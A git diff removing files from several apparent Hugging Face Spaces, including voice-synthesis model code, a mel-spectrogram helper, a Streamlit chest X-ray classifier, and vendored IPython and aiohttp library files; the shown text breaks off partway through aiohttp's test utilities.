tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMsNSFsidM(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - version, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - if version == "v1": - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - else: - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - self.speaker_map = None - logger.debug( - "gin_channels: " - + gin_channels - + ", self.spk_embed_dim: " - + self.spk_embed_dim - ) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def construct_spkmixmap(self, n_speaker): - self.speaker_map = torch.zeros((n_speaker, 1, 1, self.gin_channels)) - for i in range(n_speaker): - self.speaker_map[i] = self.emb_g(torch.LongTensor([[i]])) - self.speaker_map = self.speaker_map.unsqueeze(0) - - def forward(self, phone, phone_lengths, pitch, nsff0, g, rnd, max_len=None): - if self.speaker_map is not None: # [N, S] * [S, B, 1, H] - g = g.reshape((g.shape[0], g.shape[1], 1, 1, 1)) # [N, S, B, 1, 1] - g = g * self.speaker_map # [N, S, B, 1, H] - g = torch.sum(g, dim=1) # [N, 1, B, 1, H] - g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N] - else: - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * rnd) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(kernel_size, 1), 0), - ) - ), - norm_f( - Conv2d( - 1024, - 1024, - (kernel_size, 1), - 1, - padding=(get_padding(kernel_size, 1), 0), - ) - ), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap diff --git a/spaces/Sky5408er/vits-uma-genshin-honkai/mel_processing.py b/spaces/Sky5408er/vits-uma-genshin-honkai/mel_processing.py deleted file mode 100644 index 3e252e76320522a8a4195a60665168f22769aec2..0000000000000000000000000000000000000000 --- a/spaces/Sky5408er/vits-uma-genshin-honkai/mel_processing.py +++ /dev/null @@ -1,101 +0,0 @@ -import torch -import torch.utils.data -from librosa.filters import mel as librosa_mel_fn - -MAX_WAV_VALUE = 32768.0 - - -def dynamic_range_compression_torch(x, C=1, clip_val=1e-5): - """ - PARAMS - ------ - C: compression factor - """ - return torch.log(torch.clamp(x, min=clip_val) * C) - - -def dynamic_range_decompression_torch(x, C=1): - """ - PARAMS - ------ - C: compression factor used to compress - """ - return torch.exp(x) / C - - -def spectral_normalize_torch(magnitudes): - output = dynamic_range_compression_torch(magnitudes) - return output - - -def spectral_de_normalize_torch(magnitudes): - output = dynamic_range_decompression_torch(magnitudes) - return output - - -mel_basis = {} -hann_window = {} - - -def spectrogram_torch(y, n_fft, sampling_rate, hop_size, win_size, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True, return_complex=False) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - return spec - - -def spec_to_mel_torch(spec, n_fft, num_mels, sampling_rate, fmin, fmax): - global mel_basis - dtype_device = str(spec.dtype) + '_' + str(spec.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=spec.dtype, device=spec.device) - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - return spec - - -def mel_spectrogram_torch(y, n_fft, num_mels, sampling_rate, hop_size, win_size, fmin, fmax, center=False): - if torch.min(y) < -1.: - print('min value is ', torch.min(y)) - if torch.max(y) > 1.: - print('max value is ', torch.max(y)) - - global mel_basis, hann_window - dtype_device = str(y.dtype) + '_' + str(y.device) - fmax_dtype_device = str(fmax) + '_' + dtype_device - wnsize_dtype_device = str(win_size) + '_' + dtype_device - if fmax_dtype_device not in mel_basis: - mel = librosa_mel_fn(sampling_rate, n_fft, num_mels, fmin, fmax) - mel_basis[fmax_dtype_device] = torch.from_numpy(mel).to(dtype=y.dtype, device=y.device) - if wnsize_dtype_device not in hann_window: - hann_window[wnsize_dtype_device] = torch.hann_window(win_size).to(dtype=y.dtype, device=y.device) - - y = torch.nn.functional.pad(y.unsqueeze(1), (int((n_fft-hop_size)/2), int((n_fft-hop_size)/2)), mode='reflect') - y = y.squeeze(1) - - spec = torch.stft(y, n_fft, hop_length=hop_size, win_length=win_size, window=hann_window[wnsize_dtype_device], - center=center, pad_mode='reflect', normalized=False, onesided=True) - - spec = torch.sqrt(spec.pow(2).sum(-1) + 1e-6) - - spec = torch.matmul(mel_basis[fmax_dtype_device], spec) - spec = spectral_normalize_torch(spec) - - return spec diff --git a/spaces/Spectrez/Chest-Lung-Identification/app.py b/spaces/Spectrez/Chest-Lung-Identification/app.py deleted file mode 100644 index 0da7294ff35bace59405f7e14d9bab2df67c0548..0000000000000000000000000000000000000000 --- a/spaces/Spectrez/Chest-Lung-Identification/app.py +++ /dev/null @@ -1,53 +0,0 @@ -import streamlit as st -import tensorflow as tf -from PIL import Image -import cv2 as cv -import numpy as np - - -model = tf.keras.models.load_model("LUNG-AI-5.h5") -st.title("AI Lung Prediction") -img = st.file_uploader("Upload a Chest X-ray", type=["jpg", "png"], accept_multiple_files=False, label_visibility="visible") -# st.write(print(img)) - -class_names = [ - 'Normal', - 'Pneumonia' -] - - -if img != None: - st.image(img, width=300) - img = Image.open(img) - img = img.convert('RGB') - # image_preprocess.load() # required for png.split() - # img = Image.new("RGB", image_preprocess.size, (255, 255, 255)) - # img.paste(image_preprocess, mask=image_preprocess.split()[3]) # 3 is the alpha channel - -else: - st.header("Please Upload a Lung X-ray") - - - -img = cv.resize(np.asarray(img), (100, 100)) -# if img != None: -image_p = [] -image_p.append(cv.resize(img, (100, 100))) -image_p = np.asanyarray(image_p) - -image_p = image_p / 255.0 - -probability_model = tf.keras.Sequential([ - model, - tf.keras.layers.Softmax() -]) - - -predictions = probability_model.predict(image_p) -image_class_predict = np.argmax(predictions) - - -if image_class_predict == 0: - st.subheader("Normal Lung") -elif image_class_predict == 1: - st.subheader("Pneumonia Lung") diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/historyapp.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/historyapp.py deleted file mode 100644 index 01a55343f8a51f59b77da952a6e71088e0c4debf..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/historyapp.py +++ /dev/null @@ -1,161 +0,0 @@ -# encoding: utf-8 -""" -An application for managing IPython history. - -To be invoked as the `ipython history` subcommand. -""" - -import sqlite3 -from pathlib import Path - -from traitlets.config.application import Application -from .application import BaseIPythonApplication -from traitlets import Bool, Int, Dict -from ..utils.io import ask_yes_no - -trim_hist_help = """Trim the IPython history database to the last 1000 entries. - -This actually copies the last 1000 entries to a new database, and then replaces -the old file with the new. Use the `--keep=` argument to specify a number -other than 1000. -""" - -clear_hist_help = """Clear the IPython history database, deleting all entries. - -Because this is a destructive operation, IPython will prompt the user if they -really want to do this. Passing a `-f` flag will force clearing without a -prompt. - -This is an handy alias to `ipython history trim --keep=0` -""" - - -class HistoryTrim(BaseIPythonApplication): - description = trim_hist_help - - backup = Bool(False, - help="Keep the old history file as history.sqlite." - ).tag(config=True) - - keep = Int(1000, - help="Number of recent lines to keep in the database." - ).tag(config=True) - - flags = Dict(dict( - backup = ({'HistoryTrim' : {'backup' : True}}, - backup.help - ) - )) - - aliases=Dict(dict( - keep = 'HistoryTrim.keep' - )) - - def start(self): - profile_dir = Path(self.profile_dir.location) - hist_file = profile_dir / "history.sqlite" - con = sqlite3.connect(hist_file) - - # Grab the recent history from the current database. - inputs = list(con.execute('SELECT session, line, source, source_raw FROM ' - 'history ORDER BY session DESC, line DESC LIMIT ?', (self.keep+1,))) - if len(inputs) <= self.keep: - print("There are already at most %d entries in the history database." % self.keep) - print("Not doing anything. Use --keep= argument to keep fewer entries") - return - - print("Trimming history to the most recent %d entries." % self.keep) - - inputs.pop() # Remove the extra element we got to check the length. - inputs.reverse() - if inputs: - first_session = inputs[0][0] - outputs = list(con.execute('SELECT session, line, output FROM ' - 'output_history WHERE session >= ?', (first_session,))) - sessions = list(con.execute('SELECT session, start, end, num_cmds, remark FROM ' - 'sessions WHERE session >= ?', (first_session,))) - con.close() - - # Create the new history database. - new_hist_file = profile_dir / "history.sqlite.new" - i = 0 - while new_hist_file.exists(): - # Make sure we don't interfere with an existing file. - i += 1 - new_hist_file = profile_dir / ("history.sqlite.new" + str(i)) - new_db = sqlite3.connect(new_hist_file) - new_db.execute("""CREATE TABLE IF NOT EXISTS sessions (session integer - primary key autoincrement, start timestamp, - end timestamp, num_cmds integer, remark text)""") - new_db.execute("""CREATE TABLE IF NOT EXISTS history - (session integer, line integer, source text, source_raw text, - PRIMARY KEY (session, line))""") - new_db.execute("""CREATE TABLE IF NOT EXISTS output_history - (session integer, line integer, output text, - PRIMARY KEY (session, line))""") - new_db.commit() - - - if inputs: - with new_db: - # Add the recent history into the new database. - new_db.executemany('insert into sessions values (?,?,?,?,?)', sessions) - new_db.executemany('insert into history values (?,?,?,?)', inputs) - new_db.executemany('insert into output_history values (?,?,?)', outputs) - new_db.close() - - if self.backup: - i = 1 - backup_hist_file = profile_dir / ("history.sqlite.old.%d" % i) - while backup_hist_file.exists(): - i += 1 - backup_hist_file = profile_dir / ("history.sqlite.old.%d" % i) - hist_file.rename(backup_hist_file) - print("Backed up longer history file to", backup_hist_file) - else: - hist_file.unlink() - - new_hist_file.rename(hist_file) - -class HistoryClear(HistoryTrim): - description = clear_hist_help - keep = Int(0, - help="Number of recent lines to keep in the database.") - - force = Bool(False, - help="Don't prompt user for confirmation" - ).tag(config=True) - - flags = Dict(dict( - force = ({'HistoryClear' : {'force' : True}}, - force.help), - f = ({'HistoryTrim' : {'force' : True}}, - force.help - ) - )) - aliases = Dict() - - def start(self): - if self.force or ask_yes_no("Really delete all ipython history? ", - default="no", interrupt="no"): - HistoryTrim.start(self) - -class HistoryApp(Application): - name = u'ipython-history' - description = "Manage the IPython history database." - - subcommands = Dict(dict( - trim = (HistoryTrim, HistoryTrim.description.splitlines()[0]), - clear = (HistoryClear, HistoryClear.description.splitlines()[0]), - )) - - def start(self): - if self.subapp is None: - print("No subcommand specified. Must specify one of: %s" % \ - (self.subcommands.keys())) - print() - self.print_description() - self.print_subcommands() - self.exit(1) - else: - return self.subapp.start() diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/test_events.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/test_events.py deleted file mode 100644 index cc9bf40fd6dc42e48e93ecce71c714706613afd3..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/IPython/core/tests/test_events.py +++ /dev/null @@ -1,91 +0,0 @@ -import unittest -from unittest.mock import Mock - -from IPython.core import events -import IPython.testing.tools as tt - - -@events._define_event -def ping_received(): - pass - - -@events._define_event -def event_with_argument(argument): - pass - - -class CallbackTests(unittest.TestCase): - def setUp(self): - self.em = events.EventManager(get_ipython(), - {'ping_received': ping_received, - 'event_with_argument': event_with_argument}) - - def test_register_unregister(self): - cb = Mock() - - self.em.register('ping_received', cb) - self.em.trigger('ping_received') - self.assertEqual(cb.call_count, 1) - - self.em.unregister('ping_received', cb) - self.em.trigger('ping_received') - self.assertEqual(cb.call_count, 1) - - def test_bare_function_missed_unregister(self): - def cb1(): - ... - - def cb2(): - ... - - self.em.register("ping_received", cb1) - self.assertRaises(ValueError, self.em.unregister, "ping_received", cb2) - self.em.unregister("ping_received", cb1) - - def test_cb_error(self): - cb = Mock(side_effect=ValueError) - self.em.register('ping_received', cb) - with tt.AssertPrints("Error in callback"): - self.em.trigger('ping_received') - - def test_cb_keyboard_interrupt(self): - cb = Mock(side_effect=KeyboardInterrupt) - self.em.register('ping_received', cb) - with tt.AssertPrints("Error in callback"): - self.em.trigger('ping_received') - - def test_unregister_during_callback(self): - invoked = [False] * 3 - - def func1(*_): - invoked[0] = True - self.em.unregister('ping_received', func1) - self.em.register('ping_received', func3) - - def func2(*_): - invoked[1] = True - self.em.unregister('ping_received', func2) - - def func3(*_): - invoked[2] = True - - self.em.register('ping_received', func1) - self.em.register('ping_received', func2) - - self.em.trigger('ping_received') - self.assertEqual([True, True, False], invoked) - self.assertEqual([func3], self.em.callbacks['ping_received']) - - def test_ignore_event_arguments_if_no_argument_required(self): - call_count = [0] - def event_with_no_argument(): - call_count[0] += 1 - - self.em.register('event_with_argument', event_with_no_argument) - self.em.trigger('event_with_argument', 'the argument') - self.assertEqual(call_count[0], 1) - - self.em.unregister('event_with_argument', event_with_no_argument) - self.em.trigger('ping_received') - self.assertEqual(call_count[0], 1) diff --git a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/test_utils.py b/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/test_utils.py deleted file mode 100644 index fcda2f3ddc045a381470012ba331c75299af4981..0000000000000000000000000000000000000000 --- a/spaces/SungBeom/chatwine-korean/.venv/Lib/site-packages/aiohttp/test_utils.py +++ /dev/null @@ -1,706 +0,0 @@ -"""Utilities shared by tests.""" - -import asyncio -import contextlib -import gc -import inspect -import ipaddress -import os -import socket -import sys -import warnings -from abc import ABC, abstractmethod -from types import TracebackType -from typing import ( - TYPE_CHECKING, - Any, - Callable, - Iterator, - List, - Optional, - Type, - Union, - cast, -) -from unittest import mock - -from aiosignal import Signal -from multidict import CIMultiDict, CIMultiDictProxy -from yarl import URL - -import aiohttp -from aiohttp.client import _RequestContextManager, _WSRequestContextManager - -from . import ClientSession, hdrs -from .abc import AbstractCookieJar -from .client_reqrep import ClientResponse -from .client_ws import ClientWebSocketResponse -from .helpers import PY_38, sentinel -from .http import HttpVersion, RawRequestMessage -from .web import ( - Application, - AppRunner, - BaseRunner, - Request, - Server, - ServerRunner, - SockSite, - UrlMappingMatchInfo, -) -from .web_protocol import _RequestHandler - -if TYPE_CHECKING: # pragma: no cover - from ssl import SSLContext -else: - SSLContext = None - -if PY_38: - from unittest import IsolatedAsyncioTestCase as TestCase -else: - from asynctest import TestCase # type: ignore[no-redef] - -REUSE_ADDRESS = os.name == "posix" and sys.platform != "cygwin" - - -def get_unused_port_socket( - host: str, family: socket.AddressFamily = socket.AF_INET -) -> socket.socket: - return get_port_socket(host, 0, family) - - -def get_port_socket( - host: str, port: int, family: socket.AddressFamily -) -> socket.socket: - s = socket.socket(family, socket.SOCK_STREAM) - if REUSE_ADDRESS: - # Windows has different semantics for SO_REUSEADDR, - # so don't set it. Ref: - # https://docs.microsoft.com/en-us/windows/win32/winsock/using-so-reuseaddr-and-so-exclusiveaddruse - s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) - s.bind((host, port)) - return s - - -def unused_port() -> int: - """Return a port that is unused on the current host.""" - with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: - s.bind(("127.0.0.1", 0)) - return cast(int, s.getsockname()[1]) - - -class BaseTestServer(ABC): - __test__ = False - - def __init__( - self, - *, - scheme: Union[str, object] = sentinel, - loop: Optional[asyncio.AbstractEventLoop] = None, - host: str = "127.0.0.1", - port: Optional[int] = None, - skip_url_asserts: bool = False, - socket_factory: Callable[ - [str, int, socket.AddressFamily], socket.socket - ] = get_port_socket, - **kwargs: Any, - ) -> None: - self._loop = loop - self.runner: Optional[BaseRunner] = None - self._root: Optional[URL] = None - self.host = host - self.port = port - self._closed = False - self.scheme = scheme - self.skip_url_asserts = skip_url_asserts - self.socket_factory = socket_factory - - async def start_server( - self, loop: Optional[asyncio.AbstractEventLoop] = None, **kwargs: Any - ) -> None: - if self.runner: - return - self._loop = loop - self._ssl = kwargs.pop("ssl", None) - self.runner = await self._make_runner(**kwargs) - await self.runner.setup() - if not self.port: - self.port = 0 - try: - version = ipaddress.ip_address(self.host).version - except ValueError: - version = 4 - family = socket.AF_INET6 if version == 6 else socket.AF_INET - _sock = self.socket_factory(self.host, self.port, family) - self.host, self.port = _sock.getsockname()[:2] - site = SockSite(self.runner, sock=_sock, ssl_context=self._ssl) - await site.start() - server = site._server - assert server is not None - sockets = server.sockets - assert sockets is not None - self.port = sockets[0].getsockname()[1] - if self.scheme is sentinel: - if self._ssl: - scheme = "https" - else: - scheme = "http" - self.scheme = scheme - self._root = URL(f"{self.scheme}://{self.host}:{self.port}") - - @abstractmethod # pragma: no cover - async def _make_runner(self, **kwargs: Any) -> BaseRunner: - pass - - def make_url(self, path: str) -> URL: - assert self._root is not None - url = URL(path) - if not self.skip_url_asserts: - assert not url.is_absolute() - return self._root.join(url) - else: - return URL(str(self._root) + path) - - @property - def started(self) -> bool: - return self.runner is not None - - @property - def closed(self) -> bool: - return self._closed - - @property - def handler(self) -> Server: - # for backward compatibility - # web.Server instance - runner = self.runner - assert runner is not None - assert runner.server is not None - return runner.server - - async def close(self) -> None: - """Close all fixtures created by the test client. - - After that point, the TestClient is no longer usable. - - This is an idempotent function: running close multiple times - will not have any additional effects. - - close is also run when the object is garbage collected, and on - exit when used as a context manager. - - """ - if self.started and not self.closed: - assert self.runner is not None - await self.runner.cleanup() - self._root = None - self.port = None - self._closed = True - - def __enter__(self) -> None: - raise TypeError("Use async with instead") - - def __exit__( - self, - exc_type: 